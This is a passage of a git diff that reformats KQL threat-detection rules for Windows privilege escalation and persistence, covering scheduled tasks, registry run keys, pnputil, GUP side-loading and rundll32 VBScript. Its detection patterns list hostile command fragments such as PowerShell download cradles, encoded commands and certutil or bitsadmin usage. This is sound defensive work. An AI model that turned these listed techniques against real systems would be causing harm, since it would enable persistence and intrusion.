ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%") and (ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wscript"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql b/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql index 644ebc14..30ca1cf2 100644 --- a/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql +++ b/KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql @@ -1,13 +1,13 @@ -// Title: Suspicious desktop.ini Action -// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) -// Date: 2020-03-19 -// Level: medium -// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 -// False Positives: -// - Operations performed through Windows SCCM or equivalent -// - Read only access list authority - -DeviceFileEvents +// Title: Suspicious desktop.ini Action +// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO) +// Date: 2020-03-19 +// Level: medium +// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009 +// False Positives: +// - Operations performed through Windows SCCM or equivalent +// - Read only access list authority + +DeviceFileEvents | where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and FolderPath contains "\\JetBrains\\apps\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql b/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql index b804bf04..0cb317b0 100644 --- a/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql +++ b/KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql @@ -1,14 +1,14 @@ -// Title: Suspicious Driver Install by pnputil.exe -// Author: Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger -// Date: 2021-09-30 -// Level: medium -// Description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547 -// False Positives: -// - Pnputil.exe being used may be performed by a system administrator. -// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. -// - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. - -DeviceProcessEvents +// Title: Suspicious Driver Install by pnputil.exe +// Author: Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger +// Date: 2021-09-30 +// Level: medium +// Description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547 +// False Positives: +// - Pnputil.exe being used may be performed by a system administrator. +// - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. +// - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + +DeviceProcessEvents | where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/install" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/add-driver" or ProcessCommandLine contains ".inf") and FolderPath endswith "\\pnputil.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql b/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql index 9e65730c..fac6cf31 100644 --- a/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql +++ b/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Get-Variable.exe Creation -// Author: frack113 -// Date: 2022-04-23 -// Level: high -// Description: Get-Variable is a valid PowerShell cmdlet -// WindowsApps is by default in the path where PowerShell is executed. -// So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546, attack.defense-evasion, attack.t1027 - -DeviceFileEvents +// Title: Suspicious Get-Variable.exe Creation +// Author: frack113 +// Date: 2022-04-23 +// Level: high +// Description: Get-Variable is a valid PowerShell cmdlet +// WindowsApps is by default in the path where PowerShell is executed. +// So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546, attack.defense-evasion, attack.t1027 + +DeviceFileEvents | where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql b/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql index 8e91a9e5..3c376b19 100644 --- a/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql +++ b/KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql @@ -1,10 +1,10 @@ -// Title: Suspicious GrpConv Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-05-19 -// Level: high -// Description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547 - -DeviceProcessEvents +// Title: Suspicious GrpConv Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-05-19 +// Level: high +// Description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547 + +DeviceProcessEvents | where ProcessCommandLine contains "grpconv.exe -o" or ProcessCommandLine contains "grpconv -o" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql b/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql index a6918cf2..7b2d6fd6 100644 --- a/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql +++ b/KQL/rules/Privilege Escalation/suspicious_gup_usage.kql @@ -1,12 +1,12 @@ -// Title: Suspicious GUP Usage -// Author: Florian Roth (Nextron Systems) -// Date: 2019-02-06 -// Level: high -// Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Execution of tools named GUP.exe and located in folders different than Notepad++\updater - -DeviceProcessEvents +// Title: Suspicious GUP Usage +// Author: Florian Roth (Nextron Systems) +// Date: 2019-02-06 +// Level: high +// Description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Execution of tools named GUP.exe and located in folders different than Notepad++\updater + +DeviceProcessEvents | where FolderPath endswith "\\GUP.exe" and (not(((FolderPath endswith "\\Program Files\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\Program Files (x86)\\Notepad++\\updater\\GUP.exe") or (FolderPath contains "\\Users\\" and (FolderPath endswith "\\AppData\\Local\\Notepad++\\updater\\GUP.exe" or FolderPath endswith "\\AppData\\Roaming\\Notepad++\\updater\\GUP.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql b/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql index 2e570eeb..0d258bb5 100644 --- a/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql +++ b/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Modification Of Scheduled Tasks -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-28 -// Level: high -// Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location -// Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on -// Instead they modify the task after creation to include their malicious payload -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 - -DeviceProcessEvents +// Title: Suspicious Modification Of Scheduled Tasks +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-28 +// Level: high +// Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location +// Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on +// Instead they modify the task after creation to include their malicious payload +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 + +DeviceProcessEvents | where ((ProcessCommandLine contains " /Change " and ProcessCommandLine contains " /TN ") and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "bash.exe" or ProcessCommandLine contains "bash " or ProcessCommandLine contains "scrcons" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "forfiles" or ProcessCommandLine contains "scriptrunner" or ProcessCommandLine contains "hh.exe" or ProcessCommandLine contains "hh ") and (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Perflogs\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql b/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql index 4e57804a..890f936d 100644 --- a/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql +++ b/KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql @@ -1,10 +1,10 @@ -// Title: Suspicious NTLM Authentication on the Printer Spooler Service -// Author: Elastic (idea), Tobias Michalski (Nextron Systems) -// Date: 2022-05-04 -// Level: high -// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.credential-access, attack.t1212 - -DeviceProcessEvents +// Title: Suspicious NTLM Authentication on the Printer Spooler Service +// Author: Elastic (idea), Tobias Michalski (Nextron Systems) +// Date: 2022-05-04 +// Level: high +// Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.credential-access, attack.t1212 + +DeviceProcessEvents | where ((ProcessCommandLine contains "spoolss" or ProcessCommandLine contains "srvsvc" or ProcessCommandLine contains "/print/pipe/") and (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine contains "http")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql b/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql index 03b15421..7f5fb2dc 100644 --- a/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql +++ b/KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Outlook Macro Created -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-08 -// Level: high -// Description: Detects the creation of a macro file for Outlook. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Suspicious Outlook Macro Created +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: high +// Description: Detects the creation of a macro file for Outlook. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.command-and-control, attack.t1137, attack.t1008, attack.t1546 +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" and (not(InitiatingProcessFolderPath endswith "\\outlook.exe")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql b/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql index 475966e9..c8a50768 100644 --- a/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql +++ b/KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql @@ -1,12 +1,12 @@ -// Title: Suspicious PowerShell In Registry Run Keys -// Author: frack113, Florian Roth (Nextron Systems) -// Date: 2022-03-17 -// Level: medium -// Description: Detects potential PowerShell commands or code within registry run keys -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Legitimate admin or third party scripts. Baseline according to your environment - -DeviceRegistryEvents +// Title: Suspicious PowerShell In Registry Run Keys +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-03-17 +// Level: medium +// Description: Detects potential PowerShell commands or code within registry run keys +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate admin or third party scripts. Baseline according to your environment + +DeviceRegistryEvents | where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh " or RegistryValueData contains "FromBase64String" or RegistryValueData contains ".DownloadFile(" or RegistryValueData contains ".DownloadString(" or RegistryValueData contains " -w hidden " or RegistryValueData contains " -w 1 " or RegistryValueData contains "-windowstyle hidden" or RegistryValueData contains "-window hidden" or RegistryValueData contains " -nop " or RegistryValueData contains " -encodedcommand " or RegistryValueData contains "-ExecutionPolicy Bypass" or RegistryValueData contains "Invoke-Expression" or RegistryValueData contains "IEX (" or RegistryValueData contains "Invoke-Command" or RegistryValueData contains "ICM -" or RegistryValueData contains "Invoke-WebRequest" or RegistryValueData contains "IWR " or RegistryValueData contains "Invoke-RestMethod" or RegistryValueData contains "IRM " or RegistryValueData contains " -noni " or RegistryValueData contains " -noninteractive ") and (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql b/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql index bc2e8ac4..143e8011 100644 --- a/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql +++ b/KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Run Key from Download -// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poude (Nextron Systems) -// Date: 2019-10-01 -// Level: high -// Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 -// False Positives: -// - Software installers downloaded and used by users - -DeviceRegistryEvents +// Title: Suspicious Run Key from Download +// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poude (Nextron Systems) +// Date: 2019-10-01 +// Level: high +// Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Software installers downloaded and used by users + +DeviceRegistryEvents | where (InitiatingProcessFolderPath contains "\\AppData\\Local\\Packages\\Microsoft.Outlook_" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Olk\\Attachments\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" or InitiatingProcessFolderPath contains "\\Local Settings\\Temporary Internet Files\\") and (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql b/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql index 31e5d8f5..bc5532ac 100644 --- a/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql +++ b/KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql @@ -1,10 +1,10 @@ -// Title: Suspicious RunAs-Like Flag Combination -// Author: Florian Roth (Nextron Systems) -// Date: 2022-11-11 -// Level: medium -// Description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation - -DeviceProcessEvents +// Title: Suspicious RunAs-Like Flag Combination +// Author: Florian Roth (Nextron Systems) +// Date: 2022-11-11 +// Level: medium +// Description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation + +DeviceProcessEvents | where (ProcessCommandLine contains " -c cmd" or ProcessCommandLine contains " -c \"cmd" or ProcessCommandLine contains " -c powershell" or ProcessCommandLine contains " -c \"powershell" or ProcessCommandLine contains " --command cmd" or ProcessCommandLine contains " --command powershell" or ProcessCommandLine contains " -c whoami" or ProcessCommandLine contains " -c wscript" or ProcessCommandLine contains " -c cscript") and (ProcessCommandLine contains " -u system " or ProcessCommandLine contains " --user system " or ProcessCommandLine contains " -u NT" or ProcessCommandLine contains " -u \"NT" or ProcessCommandLine contains " -u 'NT" or ProcessCommandLine contains " --system " or ProcessCommandLine contains " -u administrator ") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql b/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql index ff0ca567..b46e149a 100644 --- a/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql +++ b/KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Rundll32 Invoking Inline VBScript -// Author: Florian Roth (Nextron Systems) -// Date: 2021-03-05 -// Level: high -// Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 - -DeviceProcessEvents +// Title: Suspicious Rundll32 Invoking Inline VBScript +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-05 +// Level: high +// Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055 + +DeviceProcessEvents | where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "Execute" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql index b6d74d19..2ed0fc11 100644 --- a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql +++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Scheduled Task Creation Involving Temp Folder -// Author: Florian Roth (Nextron Systems) -// Date: 2021-03-11 -// Level: high -// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 -// False Positives: -// - Administrative activity -// - Software installation - -DeviceProcessEvents +// Title: Suspicious Scheduled Task Creation Involving Temp Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2021-03-11 +// Level: high +// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 +// False Positives: +// - Administrative activity +// - Software installation + +DeviceProcessEvents | where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql index c3cfc582..0965c137 100644 --- a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql +++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Scheduled Task Creation via Masqueraded XML File -// Author: Swachchhanda Shrawan Poudel, Elastic (idea) -// Date: 2023-04-20 -// Level: medium -// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.persistence, attack.t1036.005, attack.t1053.005 - -DeviceProcessEvents +// Title: Suspicious Scheduled Task Creation via Masqueraded XML File +// Author: Swachchhanda Shrawan Poudel, Elastic (idea) +// Date: 2023-04-20 +// Level: medium +// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.persistence, attack.t1036.005, attack.t1053.005 + +DeviceProcessEvents | where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (ProcessIntegrityLevel in~ ("System", "S-1-16-16384"))))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql index 9543dfc3..0d94fa9e 100644 --- a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql +++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Scheduled Task Name As GUID -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-31 -// Level: medium -// Description: Detects creation of a scheduled task with a GUID like name -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 -// False Positives: -// - Legitimate software naming their tasks as GUIDs - -DeviceProcessEvents +// Title: Suspicious Scheduled Task Name As GUID +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-31 +// Level: medium +// Description: Detects creation of a scheduled task with a GUID like name +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 +// False Positives: +// - Legitimate software naming their tasks as GUIDs + +DeviceProcessEvents | where (ProcessCommandLine contains "}\"" or ProcessCommandLine contains "}'" or ProcessCommandLine contains "} ") and (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "/TN \"{" or ProcessCommandLine contains "/TN '{" or ProcessCommandLine contains "/TN {") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql index 08ba3dcb..42b9d589 100644 --- a/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql +++ b/KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Scheduled Task Write to System32 Tasks -// Author: Florian Roth (Nextron Systems) -// Date: 2021-11-16 -// Level: high -// Description: Detects the creation of tasks from processes executed from suspicious locations -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053 - -DeviceFileEvents +// Title: Suspicious Scheduled Task Write to System32 Tasks +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-16 +// Level: high +// Description: Detects the creation of tasks from processes executed from suspicious locations +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053 + +DeviceFileEvents | where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql b/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql index 34be5e01..371ae1d7 100644 --- a/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql +++ b/KQL/rules/Privilege Escalation/suspicious_schtasks_execution_appdata_folder.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Schtasks Execution AppData Folder -// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-03-15 -// Level: high -// Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 - -DeviceProcessEvents +// Title: Suspicious Schtasks Execution AppData Folder +// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-03-15 +// Level: high +// Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 + +DeviceProcessEvents | where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql b/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql index b0607d5d..766acfaf 100644 --- a/KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql +++ b/KQL/rules/Privilege 